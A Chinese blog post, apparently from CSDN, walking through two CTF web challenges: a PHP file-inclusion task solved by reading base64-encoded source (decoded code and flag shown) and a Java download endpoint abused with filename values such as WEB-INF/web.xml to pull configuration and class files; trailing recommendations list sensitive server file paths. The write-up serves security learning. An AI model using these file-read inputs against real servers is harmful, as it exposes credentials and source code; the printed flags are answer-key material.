文件下载,包含

已于 2023-11-12 20:59:07 修改
阅读量127 收藏
点赞数
文章标签: php 开发语言
于 2022-12-12 20:12:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41672971/article/details/128292343
版权

CTF-南邮大学,i春秋百度杯真题-白盒


1.南邮CTF

http://4.chinalover.sinaapp.com/web7/index.php  

点击

 尝试访问一下show.php

可以断定文件包含

因为你单独访问的话他显示test123,确定肯定有文件

然后你访问其他路径,发现又显示了这个,说明肯定是把这个文件包含进去了

使用协议直接读取源代码

首先先确定操作系统

 区分大小写,判断为linux

伪协议流在之前文章中提过

注意文件包含的伪协议利用姿势

是把被包含的文件用源代码的方式读取出来 ,也就是说要看什么代码就包含什么代码

PGh0bWw+CiAgICA8dGl0bGU+YXNkZjwvdGl0bGU+CiAgICAKPD9waHAKCWVycm9yX3JlcG9ydGluZygwKTsKCWlmKCEkX0dFVFtmaWxlXSl7ZWNobyAnPGEgaHJlZj0iLi9pbmRleC5waHA/ZmlsZT1zaG93LnBocCI+Y2xpY2sgbWU/IG5vPC9hPic7fQoJJGZpbGU9JF9HRVRbJ2ZpbGUnXTsKCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpewoJCWVjaG8gIk9oIG5vISI7CgkJZXhpdCgpOwoJfQoJaW5jbHVkZSgkZmlsZSk7IAovL2ZsYWc6bmN0ZntlZHVsY25pX2VsaWZfbGFjb2xfc2lfc2lodH0KCj8+CjwvaHRtbD4=

解密

 

<html>
    <title>asdf</title>
    
<?php
	error_reporting(0);
	if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
	$file=$_GET['file'];
	if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
		echo "Oh no!";
		exit();
	}
	include($file); 
//flag:nctf{edulcni_elif_lacol_si_siht}

?>
</html>

bingo

首先记得一定先搞清楚数据是通过何种方式上传(否则有时候提交数据并不好使)

post方式提交数据

进入下一个页面

可以知道是JAVA

有一个标志filename=help.docx

可以看出来有可能文件下载

直接请求一下

 

 下载了文件

所以可以确定文件下载

然后使用post方式进行提交

 成功下载

把参数换成配置文件路径,了解文件夹的目录结构

filename=WEB-INF/web.xml

 查看配置文件

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">

    <welcome-file-list>
        <welcome-file>Index</welcome-file>
    </welcome-file-list>

    <servlet>
        <servlet-name>IndexController</servlet-name>
        <servlet-class>com.wm.ctf.IndexController</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>IndexController</servlet-name>
        <url-pattern>/Index</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>LoginController</servlet-name>
        <servlet-class>com.wm.ctf.LoginController</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>LoginController</servlet-name>
        <url-pattern>/Login</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>DownloadController</servlet-name>
        <servlet-class>com.wm.ctf.DownloadController</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>DownloadController</servlet-name>
        <url-pattern>/Download</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>FlagController</servlet-name>
        <servlet-class>com.wm.ctf.FlagController</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>FlagController</servlet-name>
        <url-pattern>/Flag</url-pattern>
    </servlet-mapping>

</web-app>

 可以判断处路径

构造payload

filename=/WEB-INF/classes/com/wm/ctf/FlagController.class

出现class

解密

bboywxy8340
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf本地包括_文件包含CTF题目
weixin_39667041的博客
12-19 851
文件包含 1502、解题方法:使用php://filter协议读取index文件。3、源码分析asdferror_reporting(0);if(!$_GET[file]){echo 'click me? no';}$file=$_GET['file'];if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||st...
语言自动下载配置文件
08-19
- `自动下载配置文件`:这个可能是源码文件,包含了实际的自动下载功能。 总结,易语言自动下载配置文件是通过其内置的网络和文件操作功能实现的,涉及启动窗口的事件处理、网络请求、文件保存等多个环节。理解并...
php filter 文件包含,文件包含lfi
weixin_30830161的博客
03-10 307
CG-CTF web(文件包含漏洞)php://filter 的使用:php://filter 的应用:1、利用base64获得源码2、通过读写编码实行绕过操作打开链接为下http://4.chinalover.sinaapp.com/web7/index.php?file=show.php搜索以后发现:“简单的文件包含,当发现url中有?file=字样时可以修改后面为?file=php://fi...
极客大挑战2019(复习一下漏洞)
qq_62046696的博客
07-17 802
这种一般都是备份文件了,其实不太喜欢备份文件,扫目录太慢了,打开dirsearch进行扫目录了,其实是先尝试了一下index.php.bak发现没有,扫出来了www.zip。这道题难就难在,不按套路出牌,Flaaaag里面的f14gawsl字段,里面的值时NO,真正的flag在F1nal1y表里面的password字段。2、再尝试闭合方式,账号输入1,1’,1"判断,当输入为1’时报错,所以判断结果语句应该为单引号闭合(提示记得密码填上东西)...
BUUCTF-[极客大挑战 2019]Secret File1
Monica的博客
09-10 487
目录 题目: 分析: 源码: 知识点: 分析: 方法1: 方法2: 题目: 分析: 打开环境就是一个全黑界面加几行字,没有其他发现,日常查看源代码:发现链接 点击链接,跳转到一个有secret点击的页面,点击发现: 什么也没有。按道理不应该啊,他说在回去看看 我们返回到secret页面,查看源代码: 发现了action.php,但是仔细一看,查阅结束页面显示的是end.php,猜测可能是跳转了。 我们用bp抓包看看,...
buuctf-web-[极客大挑战 2019]Secret File1
mlws1900的博客
08-05 494
get传参,可以利用文件包含,对tp,input进行了过滤,可以用filter对文件进行读取,而且已经告知我们flag在flag.php里面,写出如下payload。刚开始看到这个界面还以为是目录扫描,结果把网页扫死了。发现一个 secr3t.php,打开获得了代码。对以上编码进行base64解码获得flag。点击secret,看来要利用bp抓包。...
duandianxuchuan.rar_文件下载
09-19
《端点续传:高效文件下载的实现与应用》 在数字化时代,文件的传输与下载成为了日常工作中不可或缺的一部分。本文将围绕“duandianxuchuan.rar_文件下载”这一主题,深入探讨如何实现高效的文件下载技术,特别是...
java文件上传和下载
03-17
使用jdk7及以后的文件操作,包含了常用类、常用方法的介绍和文件上传和下载的代码
libcurl下载大文件
06-26
在处理大文件下载时,libcurl表现出强大的性能和灵活性,能够有效地处理大文件传输,避免内存溢出和其他相关问题。 **libcurl基本使用** libcurl的基本使用涉及以下几个步骤: 1. **初始化**:首先,我们需要通过`...
web应用程序下载文件重命名
10-16
web应用程序从远程下载文件,通过Blob流下载并且提供重命名的接口,暴露的接口需要传入文件下载的地址以及文件的名字,文件名包含文件后缀
CTF】-Web练习日志8.12
pyhsaihz的博客
08-13 1013
ctf个人练习
[极客大挑战 2019]Secret File
rang的博客
10-18 118
根据提示,猜测这个页面可能隐藏了信息 查看源代码: 发现了/Archive_room.php 点一下密码啥都没有 用burp抓包 抓到action.php 得到secr3t.php if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){ echo "Oh no!"; exit(); } 过滤了 ../ input .
文件包含
weixin_30466421的博客
05-28 180
文件包含:在C语言中文件包含是指一个源文件可以将另一个源文件的全部内容包含进来。该命令的作用是在预编译时,将指定源文件的内容复制到当前文件中。文件包含是C语言预处理命令三个内容之一。 进去后发现http://4.chinalover.sinaapp.com/web7/index.php?file=show.php php://filter是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 ...
WEB安全基础-文件下载漏洞以及文件包含漏洞演示
IT1995的博客
01-25 6185
这个是下面演示的源码,看链接地址找对应文件 http://download.csdn.net/download/qq78442761/10224681 文件下载漏洞   登进网站后运行截图如下: 点击下载后! 可以发现一个链接,我们修改这个链接,修改成download.php?name=download.php   整体链
【代码审计】51 PHP项目类 RCE 文件包含和下载
(∪.∪ )...zzz的博客
07-14 600
@TOC xhcms-无框架-文件包含跨站-搜索或应用-include 找核心代码分析 输出函数 功能点 通过搜索关键字echo 载入代码,找到后台,一般是admin 测试XSS漏洞 测试文件包含漏洞 关键字: include include_once require require_once 根据程序实现的功能猜测可能的漏洞: 社交 交互:注入、跨站 下载、上传,和文件相关的 复制下载链接 ...
文件包含漏洞,任意文件下载/读取,常用敏感文件总结
06-11 2660
Windows: C:\boot.ini //查看系统版本 C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件 C:\Windows\repair\sam //存储系统初次安装的密码 C:\Program Files\mysql\my.ini //Mysql配置 C:\Program Files\mysql\data\mysql\user.MYD //Mysql root C:\Windows\php.ini //php配置信息 C:\Wind
文件上传、文件包含文件下载漏洞总结
weixin_48664996的博客
07-27 1173
文件上传 原理 上传文件对各大网站基本属于必备功能,如上传头像,上传简历,上传文档,但是一旦未对文件进行校验,或检验、过滤的不严格,恶意用户即可绕过网站的检测上传恶意文件,一旦上传的是木马文件并被服务器解析,恶意用户即可拿到网站的webshell。 分类 根据upload-labs的总结,上传漏洞可分为如下几种: 客户端: Js检查 使用图片马 修改webshell后缀名并用bp截断修改回后缀名并完成上传 服务器端: 检查后缀 黑名单 上传特殊可解析后缀 上传.htaccess
sharpgl 文件下载
最新发布
11-12
SharpGL文件下载是指从互联网或其他来源获取SharpGL库的文件到本地计算机。SharpGL是一个在微软Windows操作系统上实现OpenGL网格渲染的开源项目。 要进行SharpGL文件下载,首先需要找到可信赖的来源。可以在SharpGL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值